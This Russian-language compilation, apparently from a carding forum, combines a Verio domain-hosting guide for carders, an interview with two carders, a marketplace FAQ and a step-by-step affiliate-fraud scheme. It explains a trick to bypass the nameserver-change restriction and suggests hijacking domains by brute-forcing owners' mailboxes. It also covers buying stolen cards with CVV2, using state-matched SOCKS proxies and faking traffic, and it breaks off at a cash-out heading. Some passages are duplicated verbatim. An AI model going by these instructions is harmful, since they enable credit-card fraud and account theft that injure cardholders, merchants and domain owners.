Заходи туда и увидишь файл, в котором прописаны минимальные поля. В первую очередь, это SOA. Там находятся два e-mail адреса Postmaster'а и Hostmaster'а. Затем следует порядковый номер, время обновления и дата истечения срока зоны. Чуть ниже файла ты увидишь форму для новых записей, которую необходимо заполнить. Существует несколько параметров, разрешенных для добавления. Вот некоторые из них:
A. Нужен для подвязки нового сабдомена к IP-адресу. Например, запись subdomain.supercard.to. IN A 127.0.0.1 будет означать, что имя будет ссылаться на локальный адрес. Кстати, точка в конце сабдомена обязательна - она означает конец записи (в противном случае адрес будет иметь вид subdomain.supercard.to.supercard.to, то есть присоединяться к главному имени).
CNAME. Параметр позволяет создавать алиас для уже существующего имени. К примеру, admin.supercard.to. IN CNAME supercard.to. будет привязывать сабдомен к главному хосту, делая эти записи равнозначными.
MX. Расшифровывается этот параметр как Mail eXchanger. Все SMTP-службы работают со значением опции, предварительно запрашивая его с сервера имен. Это удобно, поскольку делает постоянным хост с работающим на нем smtpd для каждого домена. Пример использования:smtp.supercard.to. IN MX 10 222.222.222.222. Число 10 означает приоритет записи, соответственно, полей MX может быть несколько.
NS. Самая интересная опция, поскольку ее значение - NS-сервер для данного домена. Как я уже говорил, некоторые хостинги позволяют переносить записи с одного сервера на другой. Verio не исключение, но тут существует один нюанс. Дело в том, что если ты выбрал план DNR, изменить NS-сервер тебе не удастся (сценарий выругается на неверный план регистрации). Все было бы плохо, если бы не один трюк, позволяющий обмануть эту защитную систему. В случае, когда адрес NS-сервера содержит подстроку "verio", запрос обработается как надо, а адрес запишется в базу. Реализуется на практике это очень просто: в конфиге к твоему серверу приписывается следующая строка:
verio.cardns.net. IN A 222.222.222.222,
где 222.222.222.222 - IP-адрес сервера. После этого (когда зоны обновятся, а хост будет виден из глобала) можешь смело переносить DNS-сервер. Заполняем форму следующим образом:
supercard.to. IN NS verio.cardns.net.
Verio проглотит такой запрос, и через день зоны перенесутся на твою машину. Естественно, ты должен будешь позаботиться об этом заранее и составить конфиг для своего домена (он может совпадать с тем, что ты редактировал на Control Panel).
Стоит рассказать и об оформлении прямой зоны домена (именно она и будет переноситься на посторонний сервер). Для этого необходимо задать в главном named.conf информацию о местонахождении и значении зоны. Это делается следующим блоком данных:
Code:
zone "supercard.to" {
type master;
file "supercard.to.hosts";
allow-query { any; };
};Здесь имя зоны - любое название (лишь бы ты понял, к чему ведет этот блок), тип - предназначение DNS, master или slave (во втором случае необходимо создать внутренний блок с masters-серверами). И, наконец, allow-query обрабатывает запросы от конкретных адресов (в нашем случае любой может запросить данные о домене). Параметров в блоке zone { } может быть много, каждый из них отвечает за определенную вещь. За подробностями иди в man named.conf.
Теперь можно создавать файл supercard.to.hosts, который, как я уже говорил, не отличается от зоны на verio.net. Ты лишь можешь изменить первый параметр $TTL, который означает период, за который обновляются зоны. К примеру, его значение 1d говорит о том, что каждый день будет происходить синхронизация. Также допустимо указывать время в секундах. После всех модификаций конфигурационного файла bind, необходимо перезапустить демон. Для этого пошли процессу сигнал 1: killall -1 named.
Брешь в безопасности Verio будет на пользу кардеру, так как при выборе плана DNR, он может без проблем перетащить зоны на отдельный сервер и радоваться жизни.
TXT, SRV. Текстовые и служебные записи, которые могут быть внесены для разъяснения какой-либо информации. Так, например, можно уточнить некоторые электронные адреса. На них можно слать почту в определенных случаях (Spam, Abuse и т.п.).
Последнего параметра PTR, организующего обратный резолв (IP-адрес в hostname), ты не обнаружишь. Это обусловлено тем, что вторая зона хранится у Verio и держится в строгом секрете
. Ты же вполне можешь обойтись без PTR, создавая свои красивые виртуальные хосты (пусть даже в одну сторону) с использованием опции A.После такого описания параметров тебе несложно будет разобраться в прописке опций или переносе зон. Кстати, перенести их будет вполне логично, так как при отрицательном балансе на карте, Verio просто заблокирует FTP и WEB-доступ к сайту (останется только Control Panel). Все изменения в зонах будут немедленно отправлены на e-mail (под которым был зарегистрирован домен). Кстати, не забудь подтвердить редактирование. Это будет предложено сделать при нажатии на Submit.
Продление аккаунта и апгрейд плана
Как и любой хостинг, Verio поддерживает продление времени регистрации. Иными словами, когда у тебя заканчивается период, на который ты покупал домен, можно с легкостью его продлить. Возможно, потребуется найти другую кредитную карту. Для этого необходимо выбрать вкладку "Update Method" в разделе Billing твоей панели управления. Далее определить новые сроки и проплатить кредиткой с положительным счетом.
С апгрейдом плана все немного сложнее. Именно поэтому я советовал выбирать его сразу при регистрации. Вот что получилось в моем случае, когда я выбрал Silver Plan и захотел поменять его на Gold. Как выяснилось, для этого нужно было написать письмо администратору Verio с запросом. Затем мне пришел ответ, что моя карта истекла, и теперь мне нужно отправить ему новые данные. Все было выполнено по указанию, но вот ответ администратора меня шокировал. Для того чтобы проапгрейдить план, мне надо было позвонить по телефону в Штаты и подтвердить голосом данные о кредитке. Я забил на это дело и остался с серебряным планом. Думаю, ты бы поступил так же.
Как уже было написано, через два месяца при отрицательном счете Verio отрубит у тебя доступ к FTP и Web. Точнее, сотрет все твои каталоги и файлы, сам же вход будет возможным
. Чтобы успеть забэкапить всю важную информацию, просто следи за почтовым ящиком - за три дня до события тебе упадет письмо, в котором будет написано об отключении аккаунта.Забыли пароль?
Всякое может случиться, и запамятовать пароль на Control Panel может любой человек. Verio имеет автоматическую систему высылки подобной информации.
При логине на Web-админку ты увидишь стандартный запрос пароля от Apache. Если его ввести неверно три раза, сервер переведет тебя на страницу 403. Помимо ругани о неверном пароле, ты найдешь ссылку, ведущую на скрипт высылки забытого пароля. Никакой контрольной фразы и дополнительных данных - просто нажми "Send", и инфа уйдет на твой мыльник (за которым закрепляется домен).
Кстати, тут может возникнуть ряд идей, о хищении домена у владельца. Достаточно намутить простой POP3-брутфорс (либо просто увести мыло, на которое регился домен) и запросить данные на него - все, имя твое! Правда, учитывай, что хозяин запросто может его вернуть
, но ничто не мешает тебе выслать пароль во второй раз.Всем спасибо, все свободны!
Любой хостинг можно описать подобным образом. У каждого есть свои достоинства и недостатки, я это говорю с полной уверенностью, так как был клиентом пяти различных компаний. И этой статьи не было бы, если бы Verio не оправдал все мои ожидания. Конечно, у него есть свои минусы, так как идеального хостинга не существует, но сохранение всех зон и доступа к Control Panel после истечения срока кредитки меня весьма порадовало. Это не оставит равнодушным и тебя, ведь любой кардер не любит таких глобальных проблем, как утеря домена. Я думаю, ты не исключение.
Verio - далеко не единственная компания, предоставляющая услугу регистрации домена второго уровня. Вот краткий список подобных серверов.
www.networksolutions.com - регистрация доменов в зоне .com, .net, .org.
www.register.com - .com, .net, .org, а также .biz и .info.
www.tonic.to - обслуживание доменов в зоне .to.
www.inc.ru - единственный ресурс по оформлению доменов .ru.
Вопросы?
Control panel на Verio.net снабжена множеством ссылок на Help. Например, можно найти помощь по каждому хостинг-плану, FTP-доступу, webmail, виртуальным доменам, зонам и т.д. Кроме того, как утверждают на главной странице, любые вопросы, заданные по мылу, обязательно будут разрешены в короткие сроки.
Работа с DNS
Для проверки работоспособности зон нередко приходится пользоваться утилитой host. Вот полезные опции, которые могут тебя заинтересовать:
host -l hostname - выводит полный список сабдоменов, подвязанных к hostname.
host -t TYPE hostname - выводит значение параметра TYPE, который может иметь значение MX, NS и др. Обо всех опциях было подробно рассказано.
host hostname - выполнить преобразование hostname в IP-адрес.
Интервью с живыми кардерами
Какие-то зашуганные люди эти кардеры. Стучишься к ним в асю, предлагаешь интервью провести, объясняешь, что приватная инфа тебе на фиг не впала, что хочется просто поговорить "за жизнь". Так нет, плотно морозятся. Ведь я, возможно, полковник Мусоров из ФБР, сплю и вижу, как засадить всех на нары
.Короче, нервов мне попортили изрядно. Но мир не без добрых людей. На мое предложение откликнулись двое (настоящие имена и ники, естественно, не публикуются - прим. ред.).
XS: Сколько времени ты уже занимаешься кардингом? Расскажи о том, как и почему ты в это втянулся? Каким было первое дело, которое ты провернул?
dos: Серьезно занимался вещевым кардингом около года, 4 месяца назад бросил. Первой вещью, которую выслали, был простенький цифровой фотик. Радовался тогда, как слон. Вообще я не собирался становиться кардером, просто знал, что есть такие люди. Но как-то друг навел на один из кардерских форумов. Сначала почитал из любопытства, потом решил попробовать. Купил на свои деньги информацию о нескольких кредитных картах, и пошло-поехало. Бросил кардинг из-за того, что меня кинули подряд два человека. Кинули на дорогую электронику, которую я заказал, а долю свою не получил. У меня просто опустились руки, не хотелось дальше продолжать. Кардинг на самом деле очень нервное занятие.
XS: Насколько серьезно ты заботишься о своей privacy? Например, меняешь ли ты квартиры в целях конспирации?
Доверяешь ли приватную инфу проверенным людям?dos: Квартиры меняют только параноики. Инфу доверяю. Гораздо важнее не болтать о своем занятии направо и налево всяким друзьям-знакомым.
ВГ: Достаточно понимать, что ты делаешь, и как это может повлиять на твое дальнейшее будущее. Например, это интервью... По-моему, получилось хорошее размышление вслух ни о чем
. Для меня не существует проверенных и не проверенных людей. Есть друзья, и есть те, с кем у меня только деловые контакты.XS: Как, по-твоему, кардинг - это однозначно воровство или увлеченность знаниями об устройстве платежных систем?
dos: Кардинг - такое воровство, которое не имеет явной направленности против человека. Убытки от кардеров терпят банки и интернет-магазины, но не конкретные люди.
ВГ: Термин придумал не я. И тот, кто его придумал, дал конкретное ему объяснение. Кардинг - махинации при помощи кредитных карт и всего, что имеет к ним отношение (именно поэтому всех, кого судили за кардинг, судили по статье за мошенничество, а не за воровство).
XS: Есть ли у тебя легальная работа? Если да, расскажи о ней, если нет - почему не устроишься, и кем бы ты предпочел работать?
dos: Учусь в вузе на первом курсе. В будущем работа будет связана с защитой информации. Вполне возможно, что информацию придется защищать от тех же кардеров.
ВГ: Легальная или наемная? Легальная есть, а наемная (когда работаешь в какой-то компании) была, даже несколько, но... Вообще, я с радостью трудоустроюсь, когда в нашей стране начнут оплачивать труд должным образом, а не по 800-1500 долларов в месяц при 10-часовой занятости. При этом твой начальник ездит каждый день на новых шестисотых и семерках, а его сын, работающий с тобой же, но по 2-часовому дневному графику и 2-3 дня в неделю из пяти, получает 5000 долларов. И то "на мороженое". Предпочел бы работать в какой-нибудь из спецструктур. Например, на букву Ф
.XS: Насколько сложно сейчас быть кардером? Какими знаниями и качествами нужно в первую очередь обладать? Какова специфика современного кардерства, изменилось ли что-то по сравнению с прошлыми годами?
dos: Сейчас кардинг переживает не самые лучшие времена. Знания зависят от направления кардерства. Если это интернет, то надо уметь хорошо организовать защиту и анонимность. Если это реальный кардинг, то очень кстати приемы НЛП и обаяние
.ВГ: Ничего не изменилось. Кардерство всегда было занятием для дебилов. Это не хакерство, где нужны знания в области операционных систем и программирования. В кардерстве не нужно иметь каких-то специализированных знаний. Большинство "нынешних" кардеров - очень тупые люди, не умеющие делать НИЧЕГО, кроме того, чтобы где-то что-то красть.
XS: Какие сейчас самые популярные способы кардерства? Какие считаются самыми профессиональными (требующими высокой квалификации)?
dos: Самого популярного способа не существует, каждый зарабатывает как может. Самыми профессиональными, наверное, являются взломы банковских каналов передачи данных и различных алгоритмов шифрования электронных подписей.
ВГ: Самые популярные, наверное, аукционы. Потому что они требуют минимума знаний. Точнее, вообще их не требуют. Самый профессиональный, скорее всего, пластик. В нем хотя бы надо понимать устройство и алгоритм работы.
XS: Каково, по-твоему, соотношение серьезных кардеров (людей, которые углубленно изучают новые системы денежных платежей и внедряют свои способы обхода защиты) к парням, ищущим легкого хлеба при минимуме затрат времени?
dos: Вокруг кардинга крутится огромное количество народа, но реально что-то делает только один процент из них. Легкого хлеба в кардинге нет в принципе. Может быть, в 1997 можно было что-то поиметь, не утруждая себя изучением темы, но не сейчас.
ВГ: Матерых сейчас очень мало. 70%, если не больше - шушера, которая тупо делает copy/paste информации из какого-нибудь текстовика paypal.txt в веб-браузер. Да, они, возможно, знают все настройки и возможности аккаунтов в этой платежной системе, но лично я не считаю это серьезными познаниями из области кардинга, так как все это знают большинство юзеров, пользующихся системой легально.
XS: Как ты думаешь, имеет ли кардинг "наркотический эффект"? Возникает ли привыкание к легким деньгам, и насколько оно серьезно?
dos: Что-то такое есть. Как-то я с температурой 40 не мог отойти от компа, потому что очень хорошо кардилось
.ВГ: Имеет эффект осознания того, в какой жопе мы живем в нашей стране и насколько абсурдна и ничтожна тут жизнь. Хотя у каждого по-разному. Тут, опять же, все зависит от самого человека. Для кого-то это не более чем игра, цель которой - сделать гадость другому.
XS: Насколько активно правоохранительные органы борются сейчас с кардерами? Насколько успешно у них это получается? Какие организации занимаются проблемами кардерства? Из-за чего обычно попадаются кардеры?
dos: Борются, причем очень даже неплохо. Занимается этим ФСБ совместно с банками. Примерно раз в полгода устраивают облавы. Попадаются кардеры из-за своей неосторожности, а также из-за подстав.
ВГ: По-моему, активности с их стороны вообще нет. Там ведь тоже не идиоты работают. Понимают, что им нет смысла тратить свои силы, время и деньги на то, чтобы "спасать" граждан США (или любой другой страны). Делать ту работу, которой должна заниматься забугорная полиция. Хотя с отморозками, которые пытаются кидать здесь (на территории России) - с ними борются. Но таких, по-моему, очень мало. С ними в основном разбирается внутренняя служба безопасности конкретного банка.
XS: Были ли проблемы с ментами лично у тебя? Если да - расскажи, как попался и из-за чего. Чем все кончилось?
dos: У меня проблем не было. Но был случай, когда я весь вечер кардил, а потом заметил, что работаю без прокси-сервера. То есть меня потенциально могли без проблем выследить. Потом неделю ходил по улицам, оглядываясь. Все казалось, что за мной следят
.ВГ: У меня? Проблемы? О чем ты? Я законопослушный гражданин и честно плачу налоги
.XS: Какие основные правила должен знать каждый кардер (если не хочет, чтобы его прижучили)?
dos: Надо соблюдать анонимность. Работать с людьми, которым доверяешь. И не болтать много о том, какой ты крутой кардер.
ВГ: Те же, что и у хакера: не светить свой IP, не светить свои данные. Проще говоря, делать так, чтобы улик твоей причастности к какому-либо делу было как можно меньше. Или вообще не было
.XS: Существуют ли в России профессиональные команды, которые имеют ежемесячный оборот средств от кардинга в сотни тысяч или даже миллионы долларов?
dos: Существуют. Называть их, естественно, не буду. Такие команды принято называть семьями. Но чисто российскими их нельзя назвать, так как они рассредоточены по всему миру.
ВГ: Смотрите новости по ти-ви, там про них в последнее время что-то часто стали рассказывать
.XS: Возможно ли сейчас обуть с помощью кардерства за раз на гигантскую сумму? Скажем, на десять миллионов баксов? Как это возможно в общих чертах?
dos: Можно, но очень-очень трудно. Можно, например, проникнуть в банковскую сеть так, чтобы никто не заметил, и с нескольких счетов перевести бабки на свой. Потом надо снять бабки со счета, пока банк ничего не просек, и убираться на какой-нибудь остров в Тихом океане.
ВГ: Несмотря на то, что определение кардерства по-прежнему "махинации с кредитными картами", на самом деле сейчас это уже более обширная тема. В нее влились такие направления, как махинации со счетами в разных платежных системах (PAYPAL, например). В силу развития интернет-технологий и электронных платежей, "обуть" можно и на 100 миллионов, но тогда это уже будет не кардерство, а хакерство. Или как это официально называется в США - identity theft. Ты берешь чужой логин и пароль от доступа через интернет к его банковскому счету, и, если там лежат 100 миллионов, переводишь их на свой счет. Что касается кредиток... как я уже сказал ранее, смотрите телевизор. Там рассказывается и о методах, и о суммах, которые имеются с этих методов
.XS: Расскажи, какие сейчас самые навороченные способы защиты, применяемые в кредитных картах? И в общих чертах способы их обхода, применяемые кардерами.
dos: Да, как таковых, новых способов нет. Вот виза, например, недавно взяла и резко сократила процент непроверенных транзакций, из-за этого многие биллинги закрылись, и кардеры потеряли еще одну возможность зарабатывать.
ВГ: Принцип работы всех кредитных карт одинаков. И применительно к сети нельзя говорить о способах защиты самих карт. Тут они не играют уже никакой роли. Другое дело - способы защиты передачи и хранения информации с этих карт в интернете. А эти способы, как показывает практика, полная херня... Так как сейчас 80% (или даже 90%) всех кардерских дел осуществляется через интернет, то все вертится вокруг кражи информации из интернета. И тут все как обычно...
XS: Отличается ли чем-то кардинг в России от кардинга в других странах? Например, в Америке? Может, есть какая-то своя специфика.
dos: Каждый американец с рождения трясется за свою кредитную историю, в которую заносятся все крупные покупки и т.п. Если человек будет замешан в чем-то плохом, это сразу же отразится на его кредитной истории. И потом ему не дадут кредит, не примут на работу. Поэтому большинство американских кардеров являются эмигрантами из СНГ
.ВГ: Ага, отличается. Там преобладают негры
.XS: Существует ли кардерская "сцена" как таковая? Есть ли в carders community свои звезды, легендарные личности? Насколько развито и велико сообщество кардеров?
dos: Конечно, есть. Называть имена не буду. Трудно оценить все сообщество кардеров. В России, думаю, несколько тысяч человек.
ВГ: Про это в вашем журнале уже рассказывал один мальчик год или два назад
.XS: Какие сайты/IRC-каналы являются центровыми для кардеров? Где собираются действительно знающие люди? Какие самые, на твой взгляд, достойные сетевые ресурсы по теме кардерства?
dos: www.carderplanet.com.
ВГ: Достойные люди не собираются на сайтах или тематических кардерских каналах
. Кардерпленет.ком - про него уже писали. Те, кто интересуется кардингом, могут обращаться туда.XS: Какие страны в мире (и в СНГ) являются лидерами по кардерской активности? Существует ли какая-то зависимость, например, от общего уровня жизни?
dos: В мире: Россия, Америка. В СНГ: Россия, Украина. Зависимости не существует из-за того, что все деньги, которые получают кардеры, распределяются в пределах небольшой группы.
ВГ: В мире - Индонезия
, а также страны бывшего соцлагеря. В СНГ - Украина, Россия, Прибалтика.XS: Каким ты видишь кардерство через десять лет? Куда все, по-твоему, идет?
dos: Через десять лет, имхо, исчезнут, наконец, кредитные карты. Но, несомненно, будут люди, которые будут заниматься электронными махинациями с денежными потоками. В том виде, в котором кардинг существует сейчас, все движется к закату кардинга.
ВГ: С развитием беспроводных технологий и базирующихся на этом технологий оплаты товара, а также технологий "физической" оплаты картами через интернет (когда, чтобы сделать оплату на сайте, ты должен вставить свою или чужую
карту в кардридер, подключенный к компьютеру, и ввести несколько пин-кодов), кардинг превратится в нечто среднее между фрикингом и хакерством. Придется красть информацию, а потом применять ее путем эмуляции через какое-то устройство.XS: Что бы ты посоветовал парням, которые не знают, что такое кардинг и как это вообще, но хотят легких денег, хотят стать кардерами?
dos: Главное - не надеяться, что деньги сразу потекут рекой. Кардинг - очень трудное занятие. Для начала надо просто начать тусоваться на кардерских форумах, вникать в тему, задавать вопросы. Через некоторое время, возможно, подвернется какая-нибудь работа. Или ты сам поймешь, что твоих знаний уже достаточно для занятия кардингом. Важно понять, что никакой добрый дядя не станет объяснять, что и как делается - до всего придется в основном доходить самостоятельно.
ВГ: Легкие деньги бывают редко. Поэтому, если хочешь хорошей и человеческой жизни, учись, получай качественные профессиональные знания и уезжай отсюда на@^#! Вообще я не собирался становиться кардером, просто знал, что есть такие люди. Но как-то друг навел на один из кардерских форумов. Сначала почитал из любопытства, потом решил попробовать. Купил на свои деньги информацию о нескольких кредитных картах, и пошло-поехало.
В данном FAQ приведены несложные рекомендации, которые помогут вам при покупке товаров или заказе услуг выбрать надежного продавца и не стать жертвой мошенников. Обращаю внимание, что это рекомендуемые, а не критические требования и не все, кто им не соответствуют, непременно мошенники.
1. Положительные отзывы. Хорошие продавцы обычно имеют много рекомендаций довольных клиентов. Начинайте именно с проверки отзывов на ресурсе, обычно они публикуются в теме с предложением. Отзывы можно подделать, потому обращайте внимание на то, сколько времени прошло с момента регистрации "довольного клиента" до момента написания им отзыва в топике, а также, сколько всего сообщений оставил пользователь, кроме написанного отзыва. Дорогого стоят отзывы старых и авторитетных участников. Возможно, продавец опубликовал на проекте несколько предложений, и в каждом из них вы найдете отзывы о работе с ним.
2. Отсутствие жалоб в разделе Арбитраж проекта. Все жалобы от клиентов (и не только) обычно публикуются и рассматриваются администрацией в разделе Арбитраж проекта, не забывайте заглянуть туда при оценке надежности продавца.
3. Наличие успешных сделок через ГАРАНТ-сервис. После проведения успешной сделки, представитель ГАРАНТ-сервиса всегда информирует об этом других участниках в теме продавца. Писать от имени ГАРАНТ-сервиса могут только Супер-модераторы и Администраторы проекта. Отзыв от ГАРАНТ-сервиса надежнее любых отзывов пользователей.
4. Статус ПРОВЕРЕННЫЙ ПРОДАВЕЦ. Статус участника на форуме должен быть максимально высоким, на нашем форуме администрация рекомендует работать только с участниками со статусом ПРОВЕРЕННЫЙ ПРОДАВЕЦ. Данные участники выделяются зеленым цветом, они проходят проверку администрации на качество товара/услуг. Мы проверяем наличие профилей на других ресурсах, наличие негативной и положительной информации в поисковиках, и информируем об этом других участников ресурса.
5. Оплаченная реклама. Посмотрите, есть ли у продавца платная реклама. Обычно мошенникам это не требуется, у них иная задача, раскидать предложения по интернету, найти жертву и обмануть. С другой стороны, надежные и честные селлеры, которые хотят постоянно продавать свой товар на площадке, в большинстве случаев, покупают рекламные места. (!) Оплаченная реклама еще не означает, что это ПРОВЕРЕННЫЙ ПРОДАВЕЦ, заказать рекламу можно и без прохождения проверки.
6. Работа через ГАРАНТ-сервис. Вы всегда можете проводить сделки через ГАРАНТ-сервисов сторонних форумов. ГАРАНТ-сервис – это надежная защита от мошенников, но только, если вы не забываете про остальные 9 пунктов данного FAQ.
7. Не гонитесь за дешевизной. Уважающие свою работу продавцы имеют достаточно клиентов и хорошо знают рынок, потому никогда не станут продавать свои товары/услуги за копейки. Дешевая цена – инструмент мошенников, а ваша жадность может привести к бедности.
8. Также не забывайте что темы проверенных продавцов помещаются в раздел Проверенные селлеры
Удачных Вам покупок.
Как делали бизнес новички кардинга
В этой статье будет описан один из немногих способов кардинга, интересный для новичков в этом деле. Сразу предупрежу, что все нижесказанное не следует применять на практике, т.к. это противозаконно и может повлечь наказание по статьям 272, 273 УК РФ, а также рассматриваться как мошенничество. Автор статьи никогда не использовал эти материалы на практике. Статья написана исключительно в образовательных целях.
Давай вкратце рассмотрим основную идею этого метода. В интернете есть множество организаций, которые делают в Сети бизнес. Очень часто можно встретить сайты, на которых предлагаются услуги хостинга, аренды серверов, продаются темплейты и скрипты для веб-мастеров. Эти компании различным образом рекламируют свои услуги, и одним из методов рекламы являются партнерские программы. Они могут быть разными, но в большинстве случаев тебе предлагают рекламировать на своем сайте товар или услугу, обычно посредством баннера. За каждого клиента, пришедшего по ссылке с твоего сайта и купившего этот товар, ты получаешь процент или некоторое фиксированное вознаграждение. Поскольку такие услуги или товары обычно являются виртуальными, то компания предлагает удобные способы их оплаты, такие, как электронные платежные системы, и, конечно, кредитные карты. В общем, если у тебя есть раскрученный веб-проект с большой посещаемостью, ты можешь работать по партнерской программе вполне легально.
А теперь подумай, что произойдет, если кто-нибудь сделает сайт, создаст видимость его нужности и посещаемости и разместит на нем баннеры партнерской программы. Допустим, его партнером будет компания, предоставляющая услуги хостинга. Далее - он сам выступает в роли покупателя: заходит на свой сайт, кликает по баннеру и попадает на страницу партнера. Выбирает интересующий его тарифный план и покупает хостинг. Только вот покупать он его будет не на свои деньги, а на чужую кредитную карту. В итоге все довольны: партнер приобрел клиента, а кардер получил процент от сделки. Как получить этот процент и превратить его из виртуальных денег в реальные и будет подробно описано ниже.
Итак, для начала необходимо:
- Стартовый капитал (примерно 300-400 долларов).
- Знание HTML, графических редакторов.
- Начальные знания английского языка (знания других языков приветствуются).
- Компьютер, доступ в интернет, прямые руки, немного серого вещества в голове.
Предполагаемая прибыль: от $500 в месяц и выше.
Подбираем партнера
Для начала нам надо подобрать партнера, чьи услуги или товары придется рекламировать. Искать партнера среди наших компаний и компаний на территории бывшего СССР бесполезно. Во-первых, потому, что это нарушает неписаные законы кардеров, во-вторых - потому, что нехорошо обманывать своих. Тем более что за бугром подобных компаний намного больше, да и платят они очень приличные деньги. Найти партнера несложно, для этого надо зайти в гугл (www.google.com) и набрать в строке поиска: «affiliates program» (партнерская программа). По запросу гугл выведет огромное количество компаний, предлагающих различные товары и услуги и приглашающих тебя стать их партнерами. Не стоит кидаться на первый попавшийся сайт, сначала лучше пройтись по разным компаниям и изучить их условия. Лучше всего, конечно, найти партнера, который будет выплачивать заработанное с помощью WebMoney или на E-Gold. Компании же, предлагающие такие способы выплат, как paypal или наличные, следует отметать сразу.
Далее нас будут интересовать способы оплаты, которыми клиенты могут заплатить за их услуги. Естественно, нам нужен способ оплаты по кредитной карте. Теперь надо обратить особое внимание на то, что именно предлагает будущий партнер. Товар должен быть виртуальным. Книги, футболки, а тем более ноутбуки не подходят. На мой взгляд, лучше всего рекламировать хостинг и темплейты. Ну а самый сладкий кусочек - услуга dedicated servers (аренда сервера). Стоит это удовольствие недешево, поэтому и проценты кардер получит немаленькие.
Теперь следует проверить, насколько легко скардить данный товар или услугу. Попробуй сначала сам, и если все пройдет нормально, то эта компания нам подходит. Да, пока не забыл – обрати внимание на то, как часто можно получать свои деньги. Я думаю, не стоит работать с компанией, которая выплачивает проценты раз в полгода. К счастью, таких маньяков почти нет.
Кроме того, есть такое понятие, как «первоначальный холд» - это время, в течение которого твои первые деньги замораживаются. Мне кажется, что оптимальным выбором будет компания, выплачивающая деньги раз в неделю и имеющая первоначальный холд 2 недели. Но это большая редкость, обычно выплаты производят раз в месяц.
Итак, подведем краткие итоги. Партнер должен:
- Находиться за пределами бывшего СССР.
- Принимать к оплате кредитные карты.
- Выплачивать проценты по WebMoney, Bitcoin или wire transfer (банковский перевод).
- Легко кардиться.
- Продавать виртуальный товар.
- Производить выплаты не реже раза в месяц.
Делаем сайт а-ля «Рога и Копыта»
Ну что ж, партнера ты нашел, теперь нужен сайт, который будет его рекламировать. Для начала следует определиться с хостингом и доменным именем. Хостинг и домен точно не должны быть нашими. Западные компании как огня боятся людей из СНГ, думая, что все мы - мошенники.
Все это добро можно, разумеется, скардить, но хостинг лучше купить. Обойдется он не очень дорого, бери самый дешевый тарифный план, т.к. базы данных и всякие примочки, типа ssh доступа, тебе вряд ли понадобятся. Домен можно и скардить, но и купить тоже можно, поскольку стоит он недорого. Будет очень обидно, если после месяца работы у тебя все это отберут, и ты не успеешь даже окупить потраченные деньги. Домен лучше зарегистрировать в зоне .com, .net, .org.
Теперь придется поработать веб-мастером. Твой сайт должен иметь идею. Это не должна быть страничка Васи Пупкина. Можно, например, сделать развлекательный сайт, онлайн-журнал обзора новинок железа-софта или то, что тебе ближе всего. Учти, что почти все западные компании откажутся с тобой работать, если на твоем сайте будет порнография, призывы к расизму, пропаганда оружия или наркотиков. Тема должна быть привычная, не вызывающая подозрений и лишних вопросов.
Дизайн сайта должен быть добротным. Совсем не стоит делать летающие звезды или прыгающих зайцев, то есть - всего того, что в народе называют попсой. Выбери спокойные цвета, привычный дизайн. Твой партнер обязательно захочет взглянуть на проект, и он никоим образом не должен вызывать подозрений. Можно пойти и более хитрым путем, например, сделать сайт на китайском языке, чтобы партнеры ничего не поняли. Делается это легко: достаточно зайти на любой китайский сайт, скопировать оттуда много иероглифов, и, поменяв их местами, вставить в свой сайт. Это очень удобное решение, поскольку вопросов будет меньше, да и партнер будет рад - ведь китайцев целый миллиард, и это очень большой рынок будущей клиентуры.
После того как проект будет готов, можно идти на сайт партнера и регистрироваться. Если все пройдет нормально и у него не появятся лишние вопросы, в скором времени ты получишь письмо с поздравлениями и дальнейшими инструкциями. Вешай на свой сайт баннеры и приступай к дальнейшей работе.
Подведем краткие итоги. Наш сайт должен иметь:
- Хостинг и домен, которые не указывают на принадлежность к СНГ.
- Смысл и идею, которая не вызовет подозрений у партнера.
- Добротный дизайн, контент и структуру.
Особенности вбива
Теперь, когда у тебя есть сайт, который рекламирует партнера, самое время для торжественной части. Тут много тонкостей. Про все рассказать не удастся, т.к. у каждого партнера свои заморочки. Но основные принципы обсудить стоит. Прежде всего, тебе понадобятся сами карты, которые ты будешь вбивать (расплачиваться за услуги спонсора). Если у тебя уже есть своя база или ты можешь взламывать интернет-магазины, то одна из статей расходов исчезает. Ну а если нет, то это совсем не проблема. Я думаю, не стоит объяснять, что сгенерированные карты уже давно никто не принимает. Карты (далее - сс) всегда можно купить в интернете у людей, которые занимаются их добычей и продажей. Найти продавца сс можно на кардерских сайтах и форумах. При выборе продавца обязательно узнай, насколько он надежен. Обычно на форумах можно посмотреть дату его регистрации и отзывы других покупателей. Тебе понадобятся карты с CVV2 кодом. Скорее всего, ты будешь использовать сс из Америки. Средняя цена в интернете - $2 за одну сс.
Бери сразу не одну-две сс, а штук 50-100. В этом случае ты можешь получить скидку от продавца. Лучше всего покупать дебитные сс, поскольку чарджбэк по ним идет дольше, месяца 3-4.
Однако карты - это еще не все. Стоит позаботиться и о своей безопасности. Для этого тебе понадобятся прокси-серверы. Не стоит надеяться на прокси, взятые из публичных источников, т.к. большинство процессингов также имеют эти списки и строго следят за тем, чтобы клиент, производящий оплату, не зашел под ними. Нам понадобятся SOCKS прокси. Желательно, чтобы прокси, которыми ты будешь пользоваться, были того же штата, что и твоя сс. Поэтому приобретать их тебе придется у людей, которые специально предоставляют подобные сервисы. Найти их можно также на кардерских форумах. В среднем, доступ к базе анонимных прокси будет стоить в месяц $60.
Но и это еще не все. Что подумает партнер, когда обнаружит, что из трех пользователей в день, заходящих к тебе на сайт, все тут же кликают на баннер и покупают его услуги? Ситуация очень странная. Могу сказать сразу, что письма партнеру с лестными отзывами о баннерах, имеющих КПД 100%, вряд ли его убедят. Значит - наш сайт должен иметь хорошую посещаемость, или хотя бы делать вид, что он ее имеет. В среднем КПД баннера – 0,1%, так что не будем отступать от этого правила - на каждый вбив создавай трафик около 1000 пользователей. Сделать это можно по-разному. Можно самому написать скрипт, можно найти бесплатные скрипты в интернете или купить. Но самый простой вариант - это купить трафик. Стоимость разная, в среднем - $1 за 1000 посещений. Люди, которые этим занимаются, называются трафагонами, и их всегда можно найти на тех же кардерских форумах.
Если все вышеперечисленное у тебя есть, можешь начинать работать. Сколько карт в день вбивать - зависит от твоей наглости. Если ты будешь вбивать по 1-2 сс в день, это будет вполне нормальный вариант.
Итак, для успешного вбива необходимо:
- Иметь карты.
- Иметь прокси того же штата, что и карта.
- Нагнать трафик на свой сайт.
Забираем кеш или тонкости обнала
